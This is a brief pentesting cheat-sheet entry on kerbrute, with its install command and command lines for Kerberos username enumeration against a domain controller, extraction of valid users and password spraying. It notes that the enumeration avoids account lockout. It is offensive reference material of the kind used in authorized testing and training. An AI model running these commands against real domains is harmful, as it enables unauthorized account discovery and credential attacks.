kerbrute ¶

kerbrute (2.4k ⭐, 2020 🪦) is a popular tool that can be used for username enumeration and for password spraying on Kerberos.

You can install it using:

$ go install github.com/ropnop/kerbrute@latest

Username enumeration 🧑: it use Kerberos Pre-Authentication to perform its enumeration. It generates event code 4768 (TGT request) instead of 4625 (login failure). It doesn't count towards account lockout.

$ kerbrute userenum -d domain --dc IP wordlist
$ kerbrute userenum -d domain --dc IP wordlist -o output.txt
$ grep + output.txt | cut -d ' ' -f8 | cut -d '@' -f1 > valid_users.txt

📚 If a user has no pre auth, their hash may be dumped, while we may have to manually investigate. Refer to AS-REP Roasting Attack.

Password Spraying 🔏

$ kerbrute passwordspray -d domain --dc IP valid_users.txt mypassword
<may not work, use nxc/cme instead>